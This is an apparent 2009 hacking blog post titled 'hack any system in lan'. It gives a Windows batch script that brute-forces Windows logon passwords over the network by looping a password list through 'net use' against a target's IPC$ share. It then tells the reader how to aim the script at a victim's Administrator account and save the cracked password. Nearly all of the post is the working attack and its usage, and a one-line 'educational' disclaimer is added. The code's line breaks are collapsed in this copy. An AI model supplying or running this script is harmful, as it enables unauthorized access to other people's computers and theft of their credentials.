03 April 2009

LAN Remote user - Dictionary Attack (hack any system in lan)

LAN Remote user - Dictionary Attack (hack any system in lan) Create and use this Batch file to launch a Dictionary attack and find the Windows logon Credentials in a LAN.You need a Dictionary text file to proceed further to launch this attack successfully. Just Follow the steps below, 1. Open up a Notepad file.2. Copy and paste the below code and save it as a Batch file with .bat extension. @echo offif “%1″==”" goto finif “%2″==”" goto findel logfile.txtFOR /F “tokens=1″ %%i in (passlist.txt) do ^echo %%i && ^net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^echo %time% %date% >> output.txt && ^echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end:finecho *****Done***** 3. Make sure that you have a Dictionary password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username. The Syntax should be like this,…C:\>LANbrute.bat Administrator Where, LANbrute.bat - This is the Name of the batch file that resides in the C Drive. - IP Address of the Target Computer. Administrator - Victim Account that you want to crack. 5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine, by using the passwords from the file passlist.txt and will not stop until it finds a right match. 6. If the right password was found, then it will save it in a text file named ‘output.txt’ on the same directory. //Disclaimer : This is only meant for Educational Means, The members of this site is not responsible for whatever you do with this. //

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